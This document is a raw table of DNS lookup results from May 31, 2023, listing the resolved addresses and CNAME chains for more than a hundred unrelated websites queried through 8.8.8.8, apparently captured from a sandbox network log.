                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.275382996 CEST8.8.8.8192.168.2.30x3d44No error (0)www.photo4b.com195.78.66.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.284738064 CEST8.8.8.8192.168.2.30x4635No error (0)www.findbc.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.284738064 CEST8.8.8.8192.168.2.30x4635No error (0)www.findbc.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.678426027 CEST8.8.8.8192.168.2.30xaa14No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.731601000 CEST8.8.8.8192.168.2.30x1c56No error (0)www.crcsi.orgcrcsi.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.731601000 CEST8.8.8.8192.168.2.30x1c56No error (0)crcsi.org165.227.252.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.733088970 CEST8.8.8.8192.168.2.30x6082No error (0)www.c9dd.com188.166.152.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.874773979 CEST8.8.8.8192.168.2.30xce06No error (0)www.mobilnic.net154.203.14.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.950393915 CEST8.8.8.8192.168.2.30x739dNo error (0)www.domon.commeubles-domon.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.950393915 CEST8.8.8.8192.168.2.30x739dNo error (0)meubles-domon.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.950393915 CEST8.8.8.8192.168.2.30x739dNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:00.988404989 CEST8.8.8.8192.168.2.30x107aNo error (0)www.vitaindu.com122.128.109.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.009890079 CEST8.8.8.8192.168.2.30xb53cName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.610275030 CEST8.8.8.8192.168.2.30xeb88No error (0)www.pwd.orgpwd.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.610275030 CEST8.8.8.8192.168.2.30xeb88No error (0)pwd.org208.109.214.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.613003016 CEST8.8.8.8192.168.2.30x3703No error (0)www.ora-ito.com213.186.33.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.613070011 CEST8.8.8.8192.168.2.30x4c93No error (0)www.jacomfg.com96.127.180.42A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:01.625210047 CEST8.8.8.8192.168.2.30x871dNo error (0)www.fink.com69.163.218.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:02.036536932 CEST8.8.8.8192.168.2.30xb560No error (0)www.valselit.com193.70.68.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:02.043039083 CEST8.8.8.8192.168.2.30x3ebcNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:02.721942902 CEST8.8.8.8192.168.2.30x324cNo error (0)www.pupi.cz103.224.182.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:02.743060112 CEST8.8.8.8192.168.2.30x5999No error (0)www.jchysk.com208.97.178.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.008366108 CEST8.8.8.8192.168.2.30xb53cName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.029170990 CEST8.8.8.8192.168.2.30x3ebcNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.100735903 CEST8.8.8.8192.168.2.30xc347No error (0)www.netcr.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.100735903 CEST8.8.8.8192.168.2.30xc347No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.100735903 CEST8.8.8.8192.168.2.30xc347No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.100735903 CEST8.8.8.8192.168.2.30xc347No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.106237888 CEST8.8.8.8192.168.2.30xc6aeNo error (0)www.2print.com2print.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:03.106237888 CEST8.8.8.8192.168.2.30xc6aeNo error (0)2print.com107.180.98.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.221621037 CEST8.8.8.8192.168.2.30xf906No error (0)www.nqks.comlive.websites.hibu.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.221621037 CEST8.8.8.8192.168.2.30xf906No error (0)live.websites.hibu.comhibu-4.zenedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.221621037 CEST8.8.8.8192.168.2.30xf906No error (0)hibu-4.zenedge.netzemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.221621037 CEST8.8.8.8192.168.2.30xf906No error (0)zemonitor-websites-hibu-com.c.inregion.waas.oci.oraclecloud.nethibu34.inregion.waas.oci.oraclecloud.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.221621037 CEST8.8.8.8192.168.2.30xf906No error (0)hibu34.inregion.waas.oci.oraclecloud.net147.154.3.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.417860031 CEST8.8.8.8192.168.2.30x1bf3No error (0)www.x0c.com185.53.177.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.554794073 CEST8.8.8.8192.168.2.30x336fNo error (0)www.dayvo.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.554794073 CEST8.8.8.8192.168.2.30x336fNo error (0)www.dayvo.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.574924946 CEST8.8.8.8192.168.2.30x9da6No error (0)www.myropcb.com74.208.236.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.875725985 CEST8.8.8.8192.168.2.30xd2b2No error (0)www.stajum.com162.43.120.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.893151045 CEST8.8.8.8192.168.2.30xedd8Name error (3)www.yumgiskor.kznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.920212984 CEST8.8.8.8192.168.2.30x271dNo error (0)www.lrsuk.comlanguage-recruitment.eu-2.volcanic.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.920212984 CEST8.8.8.8192.168.2.30x271dNo error (0)language-recruitment.eu-2.volcanic.cloudd2kt7vovxa5e81.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.920212984 CEST8.8.8.8192.168.2.30x271dNo error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.920212984 CEST8.8.8.8192.168.2.30x271dNo error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.920212984 CEST8.8.8.8192.168.2.30x271dNo error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:04.920212984 CEST8.8.8.8192.168.2.30x271dNo error (0)d2kt7vovxa5e81.cloudfront.net18.66.192.87A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:05.269314051 CEST8.8.8.8192.168.2.30xc725No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:06.154225111 CEST8.8.8.8192.168.2.30x2fd1No error (0)www.yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:06.494112968 CEST8.8.8.8192.168.2.30xe522No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:06.516223907 CEST8.8.8.8192.168.2.30x3ebcNo error (0)www.holleman.us51.79.51.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.478899002 CEST8.8.8.8192.168.2.30xff9dNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.478899002 CEST8.8.8.8192.168.2.30xff9dNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.480890036 CEST8.8.8.8192.168.2.30x5552No error (0)www.baijaku.combaijaku.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.480890036 CEST8.8.8.8192.168.2.30x5552No error (0)baijaku.com59.106.19.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.494870901 CEST8.8.8.8192.168.2.30x364Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.495915890 CEST8.8.8.8192.168.2.30x1291No error (0)www.pdqhomes.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.495915890 CEST8.8.8.8192.168.2.30x1291No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.495915890 CEST8.8.8.8192.168.2.30x1291No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.495915890 CEST8.8.8.8192.168.2.30x1291No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.496762991 CEST8.8.8.8192.168.2.30xf730No error (0)www.pr-park.com118.27.125.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.506844997 CEST8.8.8.8192.168.2.30x5180No error (0)www.olras.com80.93.82.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.507643938 CEST8.8.8.8192.168.2.30xcef2No error (0)www.jenco.co.uk104.21.23.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.507643938 CEST8.8.8.8192.168.2.30xcef2No error (0)www.jenco.co.uk172.67.208.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.528307915 CEST8.8.8.8192.168.2.30x7183No error (0)www.quadlock.comquadlock.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.528307915 CEST8.8.8.8192.168.2.30x7183No error (0)quadlock.com70.39.251.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.545631886 CEST8.8.8.8192.168.2.30xef2dServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.548604012 CEST8.8.8.8192.168.2.30x1812No error (0)www.dgmna.comdgmna.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.548604012 CEST8.8.8.8192.168.2.30x1812No error (0)dgmna.com192.124.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.753969908 CEST8.8.8.8192.168.2.30x68e7No error (0)www.rs-ag.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.753969908 CEST8.8.8.8192.168.2.30x68e7No error (0)www.rs-ag.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.761657953 CEST8.8.8.8192.168.2.30xdb94No error (0)www.alteor.clgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.761657953 CEST8.8.8.8192.168.2.30xdb94No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.761657953 CEST8.8.8.8192.168.2.30xdb94No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.909889936 CEST8.8.8.8192.168.2.30x171bNo error (0)www.item-pr.comitem-pr.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.909889936 CEST8.8.8.8192.168.2.30x171bNo error (0)item-pr.com213.186.33.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.909889936 CEST8.8.8.8192.168.2.30x171bNo error (0)item-pr.com185.15.129.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.965610981 CEST8.8.8.8192.168.2.30xfdaeNo error (0)www.mqs.com.brwww.mqs.com.br.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.965610981 CEST8.8.8.8192.168.2.30xfdaeNo error (0)www.mqs.com.br.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:14.965610981 CEST8.8.8.8192.168.2.30xfdaeNo error (0)www.mqs.com.br.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.153477907 CEST8.8.8.8192.168.2.30x78a8No error (0)www.valdal.com172.67.73.176A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.153477907 CEST8.8.8.8192.168.2.30x78a8No error (0)www.valdal.com104.26.6.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.153477907 CEST8.8.8.8192.168.2.30x78a8No error (0)www.valdal.com104.26.7.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.188338041 CEST8.8.8.8192.168.2.30x937bNo error (0)www.vazir.se206.191.152.37A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.268337011 CEST8.8.8.8192.168.2.30x8bc5No error (0)www.credo.edu.pl62.122.190.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.270301104 CEST8.8.8.8192.168.2.30x217dNo error (0)www.depalo.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.270301104 CEST8.8.8.8192.168.2.30x217dNo error (0)ghs.googlehosted.com216.58.215.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.363949060 CEST8.8.8.8192.168.2.30xba45No error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.363949060 CEST8.8.8.8192.168.2.30xba45No error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.378761053 CEST8.8.8.8192.168.2.30x22d3No error (0)www.elpro.si104.26.15.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.378761053 CEST8.8.8.8192.168.2.30x22d3No error (0)www.elpro.si172.67.70.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:15.378761053 CEST8.8.8.8192.168.2.30x22d3No error (0)www.elpro.si104.26.14.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.027190924 CEST8.8.8.8192.168.2.30x873bName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.034143925 CEST8.8.8.8192.168.2.30x408No error (0)www.otena.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.041892052 CEST8.8.8.8192.168.2.30xf3d8No error (0)www.petsfan.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.041892052 CEST8.8.8.8192.168.2.30xf3d8No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.041892052 CEST8.8.8.8192.168.2.30xf3d8No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.041892052 CEST8.8.8.8192.168.2.30xf3d8No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.043951988 CEST8.8.8.8192.168.2.30x2784No error (0)www.tvtools.fi172.67.152.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.043951988 CEST8.8.8.8192.168.2.30x2784No error (0)www.tvtools.fi104.21.88.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.162345886 CEST8.8.8.8192.168.2.30x3e27No error (0)www.transsib.comwww.studyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.162345886 CEST8.8.8.8192.168.2.30x3e27No error (0)www.studyrussian.comstudyrussian.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.162345886 CEST8.8.8.8192.168.2.30x3e27No error (0)studyrussian.com80.74.154.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.170674086 CEST8.8.8.8192.168.2.30xdfdNo error (0)www.t-tre.com135.181.73.98A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.182168961 CEST8.8.8.8192.168.2.30xefb1No error (0)www.nelipak.nl82.201.61.230A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.193101883 CEST8.8.8.8192.168.2.30x405bNo error (0)www.iamdirt.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.193101883 CEST8.8.8.8192.168.2.30x405bNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.193101883 CEST8.8.8.8192.168.2.30x405bNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.281328917 CEST8.8.8.8192.168.2.30x230cNo error (0)www.abart.plabart.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.281328917 CEST8.8.8.8192.168.2.30x230cNo error (0)abart.pl89.161.163.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.446666956 CEST8.8.8.8192.168.2.30x3c32Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.755527020 CEST8.8.8.8192.168.2.30x4cfbNo error (0)www.evcpa.comevcpa.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.755527020 CEST8.8.8.8192.168.2.30x4cfbNo error (0)evcpa.com192.124.249.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.852197886 CEST8.8.8.8192.168.2.30x51ddNo error (0)www.abdg.com192.252.154.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.855426073 CEST8.8.8.8192.168.2.30x2646No error (0)www.cokocoko.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.855426073 CEST8.8.8.8192.168.2.30x2646No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.855426073 CEST8.8.8.8192.168.2.30x2646No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.855426073 CEST8.8.8.8192.168.2.30x2646No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.855726957 CEST8.8.8.8192.168.2.30xa4ecNo error (0)www.edimart.hu81.2.194.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.862310886 CEST8.8.8.8192.168.2.30x804fNo error (0)www.vexcom.com104.21.55.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.862310886 CEST8.8.8.8192.168.2.30x804fNo error (0)www.vexcom.com172.67.173.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.864573002 CEST8.8.8.8192.168.2.30x2ccfNo error (0)www.wifi4all.nl188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:16.864573002 CEST8.8.8.8192.168.2.30x2ccfNo error (0)www.wifi4all.nl188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.097806931 CEST8.8.8.8192.168.2.30x4da9No error (0)www.naoi-a.com202.254.236.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.106409073 CEST8.8.8.8192.168.2.30x958aNo error (0)www.ora.ecnet.jpora.ecnet.jpCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.106409073 CEST8.8.8.8192.168.2.30x958aNo error (0)ora.ecnet.jp60.43.154.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.465817928 CEST8.8.8.8192.168.2.30xfcd0No error (0)www.sjbs.orgsjbs.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.465817928 CEST8.8.8.8192.168.2.30xfcd0No error (0)sjbs.org69.163.239.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.468671083 CEST8.8.8.8192.168.2.30x84e8No error (0)www.xaicom.esxaicom.esCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.468671083 CEST8.8.8.8192.168.2.30x84e8No error (0)xaicom.es188.165.133.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.481635094 CEST8.8.8.8192.168.2.30x9236No error (0)www.pcgrate.com104.21.66.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.481635094 CEST8.8.8.8192.168.2.30x9236No error (0)www.pcgrate.com172.67.201.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.487889051 CEST8.8.8.8192.168.2.30xd2c1No error (0)www.hummer.huhummer.huCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.487889051 CEST8.8.8.8192.168.2.30xd2c1No error (0)hummer.hu185.80.51.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.493105888 CEST8.8.8.8192.168.2.30xf908No error (0)www.fcwcvt.org188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.493105888 CEST8.8.8.8192.168.2.30xf908No error (0)www.fcwcvt.org188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.493168116 CEST8.8.8.8192.168.2.30x6e74No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.493168116 CEST8.8.8.8192.168.2.30x6e74No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.571207047 CEST8.8.8.8192.168.2.30x9e73No error (0)www.medius.sid2r2uj0bnofxxz.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.571207047 CEST8.8.8.8192.168.2.30x9e73No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.571207047 CEST8.8.8.8192.168.2.30x9e73No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.571207047 CEST8.8.8.8192.168.2.30x9e73No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.571207047 CEST8.8.8.8192.168.2.30x9e73No error (0)d2r2uj0bnofxxz.cloudfront.net99.84.88.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.945600986 CEST8.8.8.8192.168.2.30x7df9No error (0)www.aevga.comaevga.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.945600986 CEST8.8.8.8192.168.2.30x7df9No error (0)aevga.com108.167.164.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.978111029 CEST8.8.8.8192.168.2.30xebf6No error (0)www.speelhal.net217.19.237.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.981764078 CEST8.8.8.8192.168.2.30xfbb5No error (0)www.waldi.plwaldi.plCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:17.981764078 CEST8.8.8.8192.168.2.30xfbb5No error (0)waldi.pl46.242.238.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.114525080 CEST8.8.8.8192.168.2.30x6094No error (0)www.ka-mo-me.com211.1.226.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.216258049 CEST8.8.8.8192.168.2.30x4baeNo error (0)www.nunomira.comnunomira.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:50:18.216258049 CEST8.8.8.8192.168.2.30x4baeNo error (0)nunomira.com192.241.158.94A (IP address)IN (0x0001)false
